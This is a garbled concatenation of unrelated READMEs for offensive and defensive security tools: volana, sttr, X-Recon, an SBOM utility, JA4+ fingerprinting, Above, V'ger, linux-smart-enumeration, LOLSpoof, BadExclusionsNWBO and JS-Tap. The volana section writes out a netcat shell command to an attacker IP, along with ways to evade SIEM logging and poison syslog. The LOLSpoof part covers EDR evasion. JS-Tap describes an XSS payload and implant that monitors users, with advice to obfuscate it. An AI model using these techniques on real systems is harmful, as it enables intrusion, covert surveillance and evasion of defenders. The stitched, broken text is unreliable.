## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana Β» [command]
Keyword for volana console: * ring
: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit
: exit volana console
Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt
and decrypt
subcommand. Previously, you need to build volana
with embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it with your rce on target machine
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Why not just hide command with echo [command] | base64
? And decode on target with echo [encoded_command] | base64 -d | bash
Because we want to be protected against systems that trigger alert for base64
use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.
Keep in mind that volana
is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected we mean if we are able to trigger an alert if a certain command has been executed.
Only the volana
launching command line will be catched. π§ However, by adding a space before executing it, the default bash behavior is to not save it
.bash_history
, ".zsh_history" etc ..opensnoop
)script
, screen -L
, sexonthebash
, ovh-ttyrec
, etc..)pkill -9 script
screen
is a bit more difficult to avoid, however it does not register input (secret input: stty -echo
=> avoid)volana
with encryption /var/log/auth.log
)sudo
or su
commandslogger -p auth.info "No hacker is poisoning your syslog solution, don't worry"
)LD_PRELOAD
injection to make logSorry for the clickbait title, but no money will be provided for contibutors. π
Let me know if you have found: * a way to detect volana
* a way to spy console that don't detect volana
commands * a way to avoid a detection system
sttr
is command line software that allows you to quickly run various transformation operations on the string.
// With input prompt
sttr
// Direct input
sttr md5 "Hello World"
// File input
sttr md5 file.text
sttr base64-encode image.jpg
// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5
// Writing output to a file
sttr yaml-json file.yaml > file-output.json
You can run the below curl
to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin
folder
curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh
curl -sS https://webi.sh/sttr | sh
curl.exe https://webi.ms/sttr | powershell
See here
If you are on macOS and using Homebrew, you can install sttr
with the following:
brew tap abhimanyu003/sttr
brew install sttr
sudo snap install sttr
yay -S sttr-bin
scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr
go install github.com/abhimanyu003/sttr@latest
Download the pre-compiled binaries from the Release! page and copy them to the desired location.
sttr
command.// For interactive menu
sttr
// Provide your input
// Press two enter to open operation menu
// Press `/` to filter various operations.
// Can also press UP-Down arrows select various operations.
sttr -h
// Example
sttr zeropad -h
sttr md5 -h
sttr {command-name} {filename}
sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
sttr yaml-json file.yaml > file-output.json
curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
sttr md5 hello | sttr base64-encode
echo "Hello World" | sttr base64-encode | sttr md5
These are the few locations where sttr
was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr
to the list.
Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth
.
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.
Note:
This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (
".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"
). You can customize this list to better suit your needs by editing the setting.json file..
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.
The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.
The packages needed are mentioned in the requirements.txt
file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.Argument | Description |
---|---|
--analysis-mode | Specifies the mode of operation. Default is static . Choices are static and chroot . |
--static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service . |
--volume-path | Specifies the path to the mounted volume. Default is /mnt . |
--save-file | Specifies the output file for JSON output. |
--info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True . |
--pkg-mgr | Manually specify the package manager or dont add this option for automatic check. |
APT: | |
- Static Info Analysis: | |
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method. | |
- It analyzes the packages installed on the mounted volume located at /mnt . | |
- It saves the output in a JSON file named output.json . | |
- It generates visual plots for CHROOT analysis. |
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
Static Service Analysis:
This command runs the program in static analysis mode, specifically using the Service file analysis method.
/custom_mount
.output.json
.It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
Chroot analysis with or without Graphic output:
/mnt
.output.json
.--info-graphic
as True
else False
bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.
I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.
Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)
To understand how to read JA4+ fingerprints, see Technical Details
This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.
JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
fastly
with more to be announced...
Application | JA4+ Fingerprints |
---|---|
Chrome |
JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP) JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC) JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key) JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key) |
IcedID Malware Dropper | JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982 |
IcedID Malware |
JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8 JA4S=t120300_c030_5e2616a54c73
|
Sliver Malware |
JA4=t13d190900_9dc949149365_97f8aa674fd9 JA4S=t130200_1301_a56c5b993250 JA4X=000000000000_4f24da86fad6_bf0f0589fc03 JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
|
Cobalt Strike |
JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd JA4X=2166164053c1_2166164053c1_30d204a01551
|
SoftEther VPN |
JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client) JA4S=t130200_1302_a56c5b993250 JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
|
Qakbot | JA4X=2bab15409345_af684594efb4_000000000000 |
Pikabot | JA4X=1a59268f55e5_1a59268f55e5_795797892f9c |
Darkgate | JA4H=po10nn060000_cdb958d032b0 |
LummaC2 | JA4H=po11nn050000_d253db9d024b |
Evilginx | JA4=t13d191000_9dc949149365_e7c285222651 |
Reverse SSH Shell | JA4SSH=c76s76_c71s59_c0s70 |
Windows 10 | JA4T=64240_2-1-3-1-1-4_1460_8 |
Epson Printer | JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16 |
For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.
Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark
Download the latest JA4 binaries from: Releases.
sudo apt install tshark
./ja4 [options] [pcap]
1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH
ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]
1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder
ja4 [options] [pcap]
An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.
In the meantime, see ja4plus-mapping.csv
Feel free to do a pull request with any JA4+ data you find.
JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.
All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.
For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
Current methods and implementation details:
| Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner
The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...
To understand how to read JA4+ fingerprints, see Technical Details
JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.
JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.
All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO
JA4+ can and is being implemented into open source tools, see the License FAQ for details.
This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.
ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.
Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.
So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.
Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.
John Althouse, with feedback from:
Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.
Contact John Althouse at john@foxio.io for licensing and questions.
Copyright (c) 2024, FoxIO
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Above: Invisible network protocol sniffer
Designed for pentesters and security engineers
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes:
The tool is very simple in its operation and is driven by arguments:
.pcap
as input and looks for protocols in it.pcap
file, its name you specify yourselfusage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
Impact: What kind of attack can be performed on this protocol;
Tools: What tool can be used to launch an attack;
Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.
Mitigation: Recommendations for fixing the security problems
Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses
You can install Above directly from the Kali Linux repositories
caster@kali:~$ sudo apt update && sudo apt install above
Or...
caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install
Don't forget to deactivate your firewall on macOS!
Above requires root access for sniffing
Above can be run with or without a timer:
caster@kali:~$ sudo above --interface eth0 --timer 120
To stop traffic sniffing, press CTRL + Π‘
WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.
Example:
caster@kali:~$ sudo above --interface eth0 --timer 120
-----------------------------------------------------------------------------------------
[+] Start sniffing...
[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------
If you need to record the sniffed traffic, use the --output
argument
caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap
If you interrupt the tool with CTRL+C, the traffic is still written to the file
If you already have some recorded traffic, you can use the --input
argument to look for potential security issues
caster@kali:~$ above --input ospf-md5.cap
Example:
caster@kali:~$ sudo above --input ospf-md5.cap
[+] Analyzing pcap file...
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
The tool can detect hosts without noise in the air by processing ARP frames in passive mode
caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10
[+] Host discovery using Passive ARP
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.
V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.
pip install vger
vger --help
Currently, vger interactive
has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>
. List available modules with vger --help
.
Once a connection is established, users drop into a nested set of menus.
The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.
These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py
file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0
, with allow-root
on a user-specified port
with a user-specified password
. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /
. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
With pip install vger[ai]
you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.
There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10
you can serve the script to other hosts with the -S
flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse
tries to gradualy expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck
and posh
.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p
parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1
(./lse.sh -l1
) shows interesting information that should help you to privesc. The level 2
(./lse.sh -l2
) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh
. If you see some green yes!
, you probably have already some good stuff to work with.
If not, you should try the level 1
verbosity with ./lse.sh -l1
and you will see some more information that can be interesting.
If that does not help, level 2
will just dump everything you can gather about the service using ./lse.sh -l2
. In this case you might find useful to use ./lse.sh -l2 | less -r
.
You can also select what tests to execute by passing the -s
parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro
will execute the test usr010
and all the tests in the sections net
and pro
.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....
) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.
Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.
lolbin.exe " " * sizeof(real arguments)
Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory
Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)
nimble install winim
Programs that clear or change the previous printed console messages (such as timeout.exe 10
) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.
BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.
Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.
Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.
Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements
You can read the original blog post about JS-Tap here:
javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams
Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814
Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719
A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um
I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.
JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.
The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.
Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.
The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.
Make sure you review the configuration section below carefully before using on a publicly exposed server.
Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.
The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.
Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.
Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.
In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.
Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.
Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.
A user refreshing the page will generally break/escape the iframe trap.
Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.
A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.
Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).
Example:
